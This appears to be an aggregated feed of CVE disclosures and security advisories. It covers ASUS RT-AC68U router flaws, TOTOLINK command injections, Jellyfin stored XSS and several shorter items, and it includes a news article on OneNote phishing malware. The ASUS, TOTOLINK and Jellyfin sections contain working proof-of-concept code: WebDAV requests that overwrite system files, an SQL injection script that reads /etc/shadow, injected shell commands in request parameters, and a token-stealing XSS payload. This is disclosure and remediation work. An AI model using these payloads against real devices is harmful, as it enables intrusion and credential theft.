An issue was found in MojoJson v1.2.3 allows attackers to execute arbitary code via the destroy function.

I tested your code with Xcode, and found an error:

Initializing 'JsonValue' with an expression of incompatible type 'JsonValue \*'; dereference with \*

Check the API of JsonValue:

    JsonValue* (*Parse) (const char* jsonString);
    

So I changed the code to:

    JsonValue* value = AJson->Parse(jstr);
    

But got a runtime error:

    Invalid json value type, error char = :
    

Now the problem is that the string is not a valid json format：

    char* jstr = ":#@$^^&^(";

CVE-2023-23087: null def in function Destory · Issue #3 · scottcgi/MojoJson

Directory Traversal vulnerability in Cloud Disk in ASUS RT-AC68U router firmware version before 3.0.0.4.386.41634 allows remote attackers to write arbitrary files via improper sanitation on the target for COPY and MOVE operations.

Over the summer of my junior year, I decided to do some router pentesting. Embedded security always seemed very fun to me. I liked the idea of breaking things that are found in our everyday lives, and what better place to start than my router. I was also inspired by my friend @arinerron who had some success with his router previously.

I dumped the firmware and started analyzing the binaries in Ghidra. I also found a GitHub repository containing a modified version of the source which greatly helped with the reversing process.

**Thoughts**

In the end, I managed to find a pre-auth arbitrary file read vulnerability, which could be used to dump /etc/shadow. From here, this could be chained with an authenticated arbitrary file write vulnerability to achieve code execution.

A shodan search suggests that around 200 thousand routers online could be potentially vulnerable, although because some specialized configuration is required the actual number is probably a bit lower.

One thing I found interesting was how many of the vulnerabilities involved “off-by-slash” issues. For example, requests to /smb/* required authentication but not /smb. If anything, this shows the importance of paying attention to the details when performing code audits.

It was also cool how there was an exploitable SQL injection vulnerability in such a seemingly low-level target.

Even though the code quality wasn’t the highest - many of these vulnerabilities were not very well hidden - this was overall a pretty fun exercise in code-review.

**Timeline**

08/18/2020 - Vulnerability submitted to [email protected]  
08/18/2020 - Vendor response  
10/25/2020 - Beta firmware - official release “in one month”  
12/19/2020 - Additional correspondence  
01/18/2021 - 3.0.0.4.386.41634 released

**Writeup**

_This is an adapted version of the writeup that was sent to the ASUS security team._

This document summarizes the results of my pentesting against ASUS RT-AC68U on the latest firmware version 3.0.0.4.385_20632. These vulnerabilities range from simple denial of service, to a no-interaction unauthenticated remote code execution chain. Many of these likely apply to other similar router versions as well. I also discuss several solutions for remediation.

These were patched in version 3.0.0.4.386.41634.

Overall, I present the following vulnerabilities:

1.  No-interaction pre-authentication RCE chain
2.  No-interaction pre-authentication persistent DOS chain
3.  3 XSS vectors, two of which could chain to RCE
4.  2 temporary denial of service exploits

**Vulnerabilities**

Note that you will need to enable the lighttpd server by going to http://router.asus.com/cloud\_main.asp and enabling Cloud Disk.

Additionally, some of the exploits require the mounting of an external device.

**MOVE/COPY Priming**

No authentication file-write to /mnt/*. An attacker chain this with MOVE/COPY Off By Slash to remotely brick a router, for example, by overwriting /etc/shadow or other important configuration files.

**POC**

There are two relevant primitives - file creation and directory creation.

    fetch("/smb/js/jplayer", {
      "headers": {
        "destination": "https://domain.tld/RT-AC68U/customdir",
        "overwrite": "T",
      },
      "body": "",
      "method": "MOVE"
    });
    

_directory creation_

    fetch("/smb/control", {
      "headers": {
        "destination": "https://domain.tld/RT-AC68U/customdir/testfile",
        "overwrite": "T",
      },
      "body": "",
      "method": "MOVE"
    });
    

_file creation_

This allows an attacker to overwrite arbitrary contents under /mnt. Note that an attacker is able to create any file structure they desire with these primitives. However, while the file layout is attacker controlled, the content within the files is not.

**Analysis**

Improper sanitation on the source for COPY and MOVE operations allows an attacker to load preexisting files from the router, even without authentication.

**Mitigation**

1.  Ensure that con->physical.path starts with /mnt in the mod_webdav.so for HTTP_METHOD_MOVE and HTTP_METHOD_COPY.

**MOVE/COPY Clobbering**

Authenticated arbitrary file write to /*. Can escalate to RCE by overwriting executable files, for example /etc/zcip. Can also modify internal variables such as the router password by writing to /dev/nvram.

**POC**

Create a directory structure as such.

    /mnt
      /USB-NAME
        /path
          /etc
            passwd
    

Run the below JavaScript.

    fetch("/RT-AC68U/USB-NAME/path", { 
      "headers": {
        "overwrite": "T",
        "destination": "https://domain.tld/",
      },
      "body": "",
      "method": "COPY",
    });
    

This will overwrite /etc/passwd.

**Analysis**

Improper sanitation on the target for COPY and MOVE operations gives an attacker an arbitrary file-write primitive.

**Mitigation**

1.  Ensure that p->physical.path starts with /mnt in the mod_webdav.so for HTTP_METHOD_MOVE and HTTP_METHOD_COPY.

**MOVE/COPY Off By Slash**

No-authentication arbitrary file copying from /mnt/* to /*. Can combine with MOVE/COPY Priming to remotely brick a router, for example, by overwriting /etc/shadow or other important configuration files.

**POC**

Create a directory structure as such.

    /mnt
      /etc
        passwd
    

Run the below JavaScript.

    fetch("/RT-AC68U", { 
      "headers": {
        "overwrite": "T",
        "destination": "https://domain.tld/",
      },
      "body": "",
      "method": "COPY",
    });
    

**Analysis**

The authentication handler has an off-by-slash error, matching for /RT-AC68U/ instead of /RT-AC68U. Thus, it allows unauthenticated requests to /RT-AC68U to hit the endpoint (note that adding a slash results in a 401). This allows an attacker to perform a copy operation from /mnt to /, exploiting a similar vulnerability as in MOVE/COPY Clobbering. By creating a fake directory structure with MOVE/COPY Priming, these two vulnerabilities give an attacker a write-anywhere primitive.

**Mitigation**

1.  Ensure the authentication handler filters requests against /RT-AC68U instead of /RT-AC68U/.

**PROPFINDMEDIALIST SQL Injection**

No user-interaction arbitrary file-read. By reading /etc/shadow, an unauthorized remote attacker can disclose a hashed password. Cracking this offline gives the router password. Can be combined with MOVE/COPY Clobbering for a full no-interaction RCE chain.

**POC**

You will need to enable the Digital Media Server functionality.

Run the below javascript, for example in the dev console, while on the AiCloud page.

    (async() => {
    var author = "" + Math.random();
    var path = "/etc/shadow";
    var dId = Math.floor(100000 * Math.random()) + 10000
    var oId = Math.floor(100000 * Math.random()) + 10000
    var pId = Math.floor(100000 * Math.random()) + 10000
    var val = ("a' OR 1 ); INSERT INTO DETAILS (TITLE, ALBUM_ART, ARTIST, ID) VALUES ('a', '" + pId + "', '" + author + "', " + dId + "); -- ").split("'").join("%27")
    console.log(val.length)
    
    await fetch("/smb", {
      "headers": {
        "keyword": val,
        "mediatype": "1",
      },
      "body": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?><D:propfind xmlns:D=\"DAV:\"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>",
      "method": "PROPFINDMEDIALIST",
    });
    
    val = ("a' OR 1 ); INSERT INTO OBJECTS (PARENT_ID, OBJECT_ID, DETAIL_ID, CLASS) VALUES ('1$7', " + oId + ", " + dId + ", 'container.album.musicAlbum'); -- ").split("'").join("%27")
    console.log(val.length)
    
    
    await fetch("/smb", {
      "headers": {
    
        "keyword": val,
        "mediatype": "1",
      },
      "body": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?><D:propfind xmlns:D=\"DAV:\"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>",
      "method": "PROPFINDMEDIALIST",
    });
    
    val = ("a' OR 1 );  INSERT INTO ALBUM_ART (PATH, ID) VALUES ('" + path + "', " + pId + "); -- ").split("'").join("%27")
    console.log(val.length)
    
    
    await fetch("/smb", {
      "headers": {
        "keyword": val,
        "mediatype": "1",
      },
      "body": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?><D:propfind xmlns:D=\"DAV:\"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>",
      "method": "PROPFINDMEDIALIST",
    });
    
    await fetch("/smb", {
      "headers": {
        "classify": "album",
      },
      "body": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?><D:propfind xmlns:D=\"DAV:\"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>",
      "method": "GETMUSICCLASSIFICATION"
    }).then(a => a.text()).then(b => {
    var aidx = b.indexOf(author)
    var pay = b.substring(b.indexOf("<thumb_image>", aidx) + "<thumb_image>".length, b.indexOf("</thumb_image>", aidx))
    
    console.log(atob(pay))
    })
    })()
    

**Analysis**

        //- Avoid SQL injection!
        if( keyword!=NULL && strstr(keyword->ptr, "'")!=NULL) {      
          Cdbg(DBE, "keyword is invalid!");
          
        ...
        
        if(!buffer_is_empty(keyword)){      
          buffer_urldecode_path(keyword);
    

_mod\_webdav.c_

The check for SQL injection happens before the url decode. This allows an attacker to pass in a URL-encoded single quote, %27, bypassing any SQL injection mitigations. In addition, stacked queries are enabled allowing an attacker to easily chain statements. This can be used to create a fake album, which is ultimately triggered by the GETMUSICCLASSIFICATION method, passing a fake filepath to get_album_cover_image.

        char* album_cover_file = result2[1];
                      
        FILE* fp = fopen(album_cover_file, "rb");
    

_mod\_webdav.c_

The contents of this file pointer are then read into a buffer, and then passed directly back to the attacker.

**Mitigation**

1.  Perform the SQL injection check after bufer_urldecode_path.
2.  Sanity check on album_cover_file, for example strncmp(album_cover_file, "/mnt", 4)

Given a single valid share link, an attacker can disclose any other file.

**POC**

Create a file structure as shown (a single folder with files a.txt and b.txt).

    /mnt/XXX 
      a.txt
      b.txt
    

Create a sharelink for a.txt. Append /%2e%2e/b.txt to the sharelink.

Your final URL should look like https://domain.tld/AICLOUDXXXXXXX/a.txt/%2e%2e/b.txt. Curl the URL - curl -k https://domain.tld/AICLOUDXXXXXXX/a.txt/%2e%2e/b.txt - and note that b.txt gets downloaded.

**Analysis**

mod_aicloud_sharelink_parser URL decodes the path, but fails to filter out path traversals like /../ after decoding.

**Mitigation**

1.  Filter out /../ from AICLOUD paths

**picasa.html XSS**

With user-interaction account takeover - total file disclosure and chain with above to remote code execution.

**POC**

While logged in, visit /smb/css/service/picasa.html?v=%3C%2ftextarea%3E%3Cscript%3Ealert(%27XSS%27)%3C%2fscript%3E.jpg

**Analysis**

The abbreviated JS is shown below.

      var uploadfile_url = getUrlVars()["v"];
      ...
      var this_filename = decodeURIComponent( uploadfile_url
        .substr( uploadfile_url.lastIndexOf("/") + 1, uploadfile_url.length-1 ) );
      ...
      upload_html += '<textarea style="resize: none; width: 292px; height: 82px;" 
        autocomplete="off" id="title" name="title" class="x-form-textarea x-form-field 
        service_upload_field ' + className + '">' + this_filename + '</textarea>';
    

Note that the value of the v parameter is reflected directly into the HTML (after decoding). A malicious filename like </textarea><script>alert('XSS')</script> allows an attacker to inject scripts. This could be done silently from an attacker controlled webpage, giving an attacker access to the router as long as the user is logged in.

**Mitigation**

1.  Sanitize the value of this_filename before injecting into the HTML, as shown below.

    return mystring.replace(/&/g, "&amp;").replace(/>/g, "&gt;").replace(/</g, "&lt;").replace(/"/g, "&quot;");
    

2.  Exit on invalid characters in file name - blacklist <>.

**urlInfo XSS**

Same impact scenario as picasa.html XSS.

**POC**

While logged out, navigate to /RT-AC68U/zz%27onmouseover=a.hidden=true;alert(origin)%20id=a%20style=width:100vw;position:fixed;top:0;height:100vh;opacity:0.01%20a=

**Analysis**

The handler for urlInfo fails to escape single quotes.

              buffer_copy_string_len(out, CONST_STR_LEN("<input class='urlInfo' value='"));        
              buffer_append_string_buffer(out, con->url.rel_path);        
              buffer_append_string_len(out, CONST_STR_LEN("' type='hidden'>"));
    

_connections.c_

**Mitigation**

1.  Sanitize the urlInfo property. Escape single quotes, replacing them with the HTML entity &apos;

**openurl XSS**

Same impact scenario as picasa.html XSS.

**POC**

Navigate to /smb/..%2f'onload='alert(origin) while logged in\`.

**Analysis**

This injects the openurl property on body. The final rendered HTML is as such.

    <body openurl='/smb/../'onload='alert(origin)' fileview_only='1'></body>
    

**Mitigation**

1.  Sanitize the openurl property. Escape single quotes, replacing them with the HTML entity &apos;

**AINVITE POST Handler DOS**

No interaction/authentication denial of service.

**POC**

Run the below code in the developer console on the lighttpd webpage. This sends a POST request with body “junk” to /AINVITE.

    fetch("/AINVITE", {
      "body": "junk",
      "method": "POST"
    });
    

**Analysis**

The handler for post data looks as such.

    iVar1 = parse_postdata_from_chunkqueue(param_1,param_2,param_2->field_0x54,&local_6c);
    if ((iVar1 == 0) && (local_6c != (void *)0x0)) {
      action_value = (char *)get_url_param_ualue(local_6c,"action");
      iVar1 = strcmp(action_value,"register");
    

Note that if get_url_param_ualue(local_6c, "action"), which gets the form data parameter, returns a null value the subsequent call to strcmp will result in a NULL pointer dereference.

**Mitigation**

1.  Add a check for the return value of get_url_param_ualue(local_6c, "action") to see if it is NULL before passing into strcmp.

**/AINVIT DOS**

No interaction/authentication denial of service.

**POC**

Visit /AINVIT. This will crash the lighttpd instance.

**Analysis**

In the handler mod_aicloud_invite.so, the comparison logic looks as such.

    iVar1 = strncmp(*param_2->field_0x108,"/AINVITE",7);
    if (iVar1 == 0) {
      local_38 = strstr(*param_2->field_0x108,"/AINVITE");
      local_38 = local_38 + 1;
      if (local_38 == (char *)0x0) {
        param_2->field_0x80 = 400;
        param_2->field_0x48 = 1;
        ret_code = 2;
      }
    

Note that however, the length of “/AINVITE” is 8. Thus, if /AINVIT is sent, it’ll pass the strncmp comparison, while returning null for strstr. While there is a null check, the pointer is incremented by 1, making it worthless. This results in a null pointer dereference later.

**Mitigation**

1.  Perform the null check before incrementing the pointer.
2.  strncmp with a length of 8

CVE-2021-37317: ASUS RT-AC68U RCE

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the FileName parameter in the setUploadUserData function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setUploadUserData.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" : "setting/setUploadUserData", "ContentLength":"10485", "FileName": "a|mkdir /setUploadUserData_1111;"}
    

    int __fastcall setUploadUserData(int a1, int a2, int a3)
    {
      const char *FileName_v; // $s3
      int ContentLength_v; // $s1
      int Object; // $s0
      int v9; // $s1
      int v10; // $v0
      int v11; // $s1
      const char *v13; // $a0
      int String; // $v0
      int v15; // $s2
      int v16; // $s0
      char v17[256]; // [sp+24h] [-104h] BYREF
    
      FileName_v = (const char *)websGetVar(a2, "FileName", "");
      ContentLength_v = websGetVar(a2, "ContentLength", "");
      set_action(3);
      Object = cJSON_CreateObject();
      v9 = strtol(ContentLength_v, 0, 10);
      if ( v9 < 1000 )
      {
        v13 = "MSG_userData_error";
        goto LABEL_7;
      }
      if ( v9 >= 1048577 )
      {
        v13 = "MSG_userData_big";
    LABEL_7:
        String = cJSON_CreateString(v13);
        cJSON_AddItemToObject(Object, "upgradeERR1", String);
        unlink(FileName_v);
        set_action(0);
        goto LABEL_5;
      }
      if ( !fork(0) )
      {
        sleep(2);
        memset(v17, 0, sizeof(v17));
        v15 = malloc(v9);
        v16 = f_read(FileName_v, v15, 0, v9);
        if ( CS_DBG == 1 )
          printf("(%s:%d)=> inLen=[%d]\n", "setUploadUserData", 350, v16);
        f_write("/tmp/plugin.tar.gz", v15, v16, 0);
        free(v15);
        sprintf(v17, "md5sum %s | awk '{ print $1 }' > %s", "/tmp/plugin.tar.gz", "/userdata/SysPluginMd5");
        CsteSystem(v17, 0);
        CsteSystem("tar zxvf /tmp/plugin.tar.gz -C /tmp", 0);
        CsteSystem("sh /tmp/plugin/plugin.sh", 0);
        CsteSystem("rm -rf /tmp/plugin.tar.gz", 0);
        sprintf(v17, "rm -rf %s", FileName_v);
        CsteSystem(v17, 0);
        set_action(0);
        exit(1);
      }
      v10 = cJSON_CreateString("1");
      cJSON_AddItemToObject(Object, "upgradeStatus", v10);
    LABEL_5:
      v11 = cJSON_Print(Object);
      websGetCfgResponse(a1, a3, v11);
      cJSON_Delete(Object);
      free(v11);
      return 0;
    }

CVE-2023-24148: CVE-vulns/setUploadUserData.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagHost parameter in the setNetworkDiag function.

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagHost parameter in the function setNetworkDiag****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC1:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl":"setting/setNetworkDiag","NetDiagMethod":"0","NetDiagHost":"www.baidu.com|expr 50 - 3;"}
    

POC2:

    import requests
    url = "http://192.168.0.254:80/cgi-bin/cstecgi.cgi"
    cookie = {"Cookie":"SESSION_ID=2:1672999258:2"}
    data = {"topicurl" : "setDiagnosisCfg",
    "ip" : "192.168.1.1||mkdir /test1111;"}
    
    data1 = {'topicurl' : "setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagHost":"www.baidu.com|echo `ls`;"}
    
    response = requests.post(url, cookies=cookie, json=data1)
    print(response.text)
    print(response)
    
    data2 = {"topicurl":"setting/showNetworkDiag"}
    response = requests.post(url, cookies=cookie, json=data2)
    print(response.text)
    print(response)
    
    

The function setNetworkDiag is used to set the corresponding variable

In function showNetworkDiag

step into function getDiagInfo

CVE-2023-24139: CVE-vulns/setNetworkDiag_NetDiagHost.md at main · Double-q1015/CVE-vulns

TOTOLINK T8 V4.1.5cu was discovered to contain a command injection vulnerability via the slaveIpList parameter in the function setUpgradeFW.

TOTOLINK T8 V4.1.5cu was discovered to contain a command injection vulnerability via the slaveIpList parameter in the function setUpgradeFW

In function sub_421678,The "slaveIpList" parameter does not filter user input, which can cause command injection vulnerabilities

    import requests
    url = "http://192.168.0.1/cgi-bin/cstecgi.cgi"
    cookie = {"Cookie":"SESSION_ID=2:1672999258:2"}
    data = {'FileName':'aa', 'slaveIpList':'0\"|ls />/tmp/setUpgradeFW.txt|echo \"22', 'topicurl':'setting/setUpgradeFW'}
    rep = requests.post(url, cookies=cookie, json=data)
    print(rep.status_code)
    print(rep.text)

CVE-2023-24154: CVE-vulns/setUpgradeFW.md at main · Double-q1015/CVE-vulns

In a continuing sign that threat actors are adapting well to a post-macro world, it has emerged that the use of Microsoft OneNote documents to deliver malware via phishing attacks is on the rise.
Some of the notable malware families that are being distributed using this method include AsyncRAT, RedLine Stealer, Agent Tesla, DOUBLEBACK, Quasar RAT, XWorm, Qakbot, BATLOADER, and FormBook.

Attack Vector / Endpoint Security

In a continuing sign that threat actors are adapting well to a post-macro world, it has emerged that the use of Microsoft OneNote documents to deliver malware via phishing attacks is on the rise.

Some of the notable malware families that are being distributed using this method include AsyncRAT, RedLine Stealer, Agent Tesla, DOUBLEBACK, Quasar RAT, XWorm, Qakbot, BATLOADER, and FormBook.

Enterprise firm Proofpoint said it detected over 50 campaigns leveraging OneNote attachments in the month of January 2023 alone.

In some instances, the email phishing lures contain a OneNote file, which, in turn, embeds an HTA file that invokes a PowerShell script to retrieve a malicious binary from a remote server.

Other scenarios entail the execution of a rogue VBScript that's embedded within the OneNote document and concealed behind an image that appears as a seemingly harmless button. The VBScript, for its part, is designed to drop a PowerShell script to run DOUBLEBACK.

"It is important to note, an attack is only successful if the recipient engages with the attachment, specifically by clicking on the embedded file and ignoring the warning message displayed by OneNote," Proofpoint said.

The infection chains are made possible owing to a OneNote feature that allows for the execution of select file types directly from within the note-taking application in what's a case of a "payload smuggling" attack.

"Most file types that can be processed by MSHTA, WSCRIPT, and CSCRIPT can be executed from within OneNote," TrustedSec researcher Scott Nusbaum said. "These file types include CHM, HTA, JS, WSF, and VBS."

As remedial actions, Finnish cybersecurity firm WithSecure is recommending users block OneNote mail attachments (.one and .onepkg files) and keep close tabs on the operations of the OneNote.exe process.

The shift to OneNote is seen as a response to Microsoft's decision to disallow macros by default in Microsoft Office applications downloaded from the internet last year, prompting threat actors to experiment with uncommon file types such as ISO, VHD, SVG, CHM, RAR, HTML, and LNK.

The aim behind blocking macros is two-fold: To not only reduce the attack surface but also increase the effort required to pull off an attack, even as email continues to be the top delivery vector for malware.

But these are not the only options that have become a popular way to conceal malicious code. Microsoft Excel add-in (XLL) files and Publisher macros have also been put to use as an attack pathway to skirt Microsoft's protections and propagate a remote access trojan called Ekipa RAT and other backdoors.

The abuse of XLL files hasn't gone unnoticed by the Windows maker, which is planning an update to "block XLL add-ins coming from the internet," citing an "increasing number of malware attacks in recent months." The option is expected to be available sometime in March 2023.

When reached for comment, Microsoft told The Hacker News that it had nothing further to share at this time.

"It's clear to see how cybercriminals leverage new attack vectors or less-detected means to compromise user devices," Bitdefender's Adrian Miron said. "These campaigns are likely to proliferate in coming months, with cybercrooks testing out better or improved angles to compromise victims."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Post-Macro World Sees Rise in Microsoft OneNote Documents Delivering Malware

In Jellyfin 10.8.x through 10.8.3, the name of a collection is vulnerable to stored XSS. This allows an attacker to steal access tokens from the localStorage of the victim.

**usd-2022-0031 | Jellyfin 10.8.1 - Cross-Site Scripting**

**Advisory ID:** usd-2022-0031  
**Product:** Jellyfin  
**Affected Version:** 10.8.1  
**Vulnerability Type:** CWE-79  
**Security Risk:** Critical  
**Vendor URL:** https://jellyfin.org  
**Vendor Status:** fixed  
**CVE number:** CVE-2023-23635

**Description**

A stored XSS in Jellyfin 10.8.1 allows an remote attacker to inject JavaScript into the name of a collection to perform a Cross-Site Scripting (XSS) attack.  
Because session tokens are stored in the localStorage, the attacker can extract them via javascript.

**Proof of Concept**

The following screenshot shows how an attacker can create a malicious collection.

  
The injected JavaScript code is executed in the user's browser, if a user (e.g. admin) visits the _collections_ page.

  
If you want to do some more interesting stuff with this vulnerability like taking over the admin account, you can use the following payload to read the access tokens from the localStorage.

"><img src=/X onerror=alert(localStorage.getItem("jellyfin\_credentials"))>

Getting the access token and device id allows you to rebuild the request for the _Quick Connect_ Feature.

This feature allows users to login using a PIN. The following request sets a PIN.

POST /QuickConnect/Authorize?Code=111111 HTTP/1.1  
Host: localhost:8096  
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101 Firefox/102.0  
Accept: \*/\*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Emby-Authorization: MediaBrowser Client="Jellyfin Web", Device="Firefox", DeviceId="TW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0OyBydjoxMDAuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8xMDAuMHwxNjU2NzU0NTEwMjcz", Version="10.8.1", Token="7bd97aae0924484884d7d13a74e9517c"  
Origin: \[http://localhost:8096\]()  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Connection: close  
Cookie: sfcsrftoken=S82egH1Csl8FsxnMPQ6NGzXCWL3tiI8tNUvfsNyXnAVoGGthaUjsjrWesdhvu9Gc  
Content-Length: 0

**Fix**

It is recommended to treat all input on the website as potentially dangerous.  
Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.  
The majority of programming languages support standard procedures for encoding meta characters.

**References**

*   https://owasp.org/www-community/attacks/xss/
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23635 

**Timeline**

*   **2022-07-18**: First contact request via security@jellyfin.org
*   **2022-08-02**: Vulnerability details submitted
*   **2022-08-16**: Fixed by Vendor
*   **2023-01-16:** Requested CVE assigned
*   **2023-01-19**: The advisory is published

**Credits**

This security vulnerability was found by Christian Pöschl of usd AG.

CVE-2023-23635: Security Advisory usd- 2022-0031 | usd HeroLab

In Jellyfin 10.8.x through 10.8.3, the name of a playlist is vulnerable to stored XSS. This allows an attacker to steal access tokens from the localStorage of the victim.

**usd-2022-0030 | Jellyfin 10.8.1 - Cross-Site Scripting**

**Advisory ID:** usd-2022-0030  
**Product:** Jellyfin  
**Affected Version:** 10.8.1  
**Vulnerability Type:** Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)  
**Security Risk:** Critical  
**Vendor URL:** https://jellyfin.org  
**Vendor acknowledged vulnerability:** Yes  
**Vendor Status:** fixed  
**CVE number:** CVE-2023-23636

**Description**

The playlist name in Jellyfin 10.8.1 is vulnerable to a stored XSS which allows a low privileged user to steal access tokens from high privileged users.  
The injected code is triggered everytime a user visits the playlist page. Since access tokens are stored in the **localStorage** an attacker is able to take over accounts by reading their values.

**Proof of Concept**

The following screenshot shows the executed JavaScript payload in the victim's browser.

The following request creates a payload with injected _name_.

POST /Playlists?Name=%22%3E%3Cimg%20src%3D%2FX%20onerror%3Dalert(document.domain)%3E&Ids=0358e400bf19a370e7f2e4e69f2af64d&userId=e9239683c3384717810a900f1c2c7eb5 HTTP/1.1  
Host: localhost:8096  
Content-Length: 0  
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"  
accept: application/json  
Content-Type: application/json  
\[...\]

**Fix**

It is recommended to treat all input on the website as potentially dangerous.  
Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.  
The majority of programming languages support standard procedures for encoding meta characters.

**References**

*   https://owasp.org/www-community/attacks/xss/
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23636 

**Timeline**

*   **2022-07-18:** First contact request via security@jellyfin.org
*   **2022-08-02:** Vulnerability details submitted
*   **2022-08-16:** Fixed by Vendor
*   **2023-01-16:** Requested CVE assigned
*   **2023-01-19**: The advisory is published

**Credits**

This security vulnerability was found by Christian Pöschl of usd AG.

CVE-2023-23636: Security Advisory usd-2022-0030 | usd HeroLab

Cross-Site Request Forgery (CSRF) vulnerability in JS Help Desk plugin <= 2.7.1 versions.

**Solution**

Update the WordPress JS Help Desk – Best Help Desk & Support Plugin plugin to the latest available version (at least 2.7.2).

Vlad Vector discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress JS Help Desk – Best Help Desk & Support Plugin Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 2.7.2.

**4 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-46842: WordPress JS Help Desk plugin <= 2.7.1 - Multiple Cross Site Request Forgery (CSRF) Vulnerabilities - Patchstack

### Impact
The upload functionality for updating user profile does not properly validate the file content-type, allowing any authenticated user to bypass this security check by adding a valid signature (p.e. GIF89) and sending any invalid content-type. This could allow an authenticated attacker to upload HTML files with JS content that will be executed in the context of the domain.

### Patches
Update to version 10.5.16 or apply this patch manually https://github.com/pimcore/pimcore/pull/14125.patch

**Package**

composer pimcore/pimcore (Composer)

**Affected versions**

< 10.5.16

**Patched versions**

10.5.16

**Description**

**Impact**

The upload functionality for updating user profile does not properly validate the file content-type, allowing any authenticated user to bypass this security check by adding a valid signature (p.e. GIF89) and sending any invalid content-type. This could allow an authenticated attacker to upload HTML files with JS content that will be executed in the context of the domain.

**Patches**

Update to version 10.5.16 or apply this patch manually https://github.com/pimcore/pimcore/pull/14125.patch

**References**

*   GHSA-8xv4-jj4h-qww6
*   pimcore/pimcore#14125
*   https://huntr.dev/bounties/aa7ee076-d729-4fcc-9bcc-48bcbb8eac38/

Last updated

Feb 2, 2023

Reviewed

Feb 2, 2023

Published to the GitHub Advisory Database

Feb 2, 2023

 dvesh3 published to pimcore/pimcore

Feb 1, 2023

Tag

#js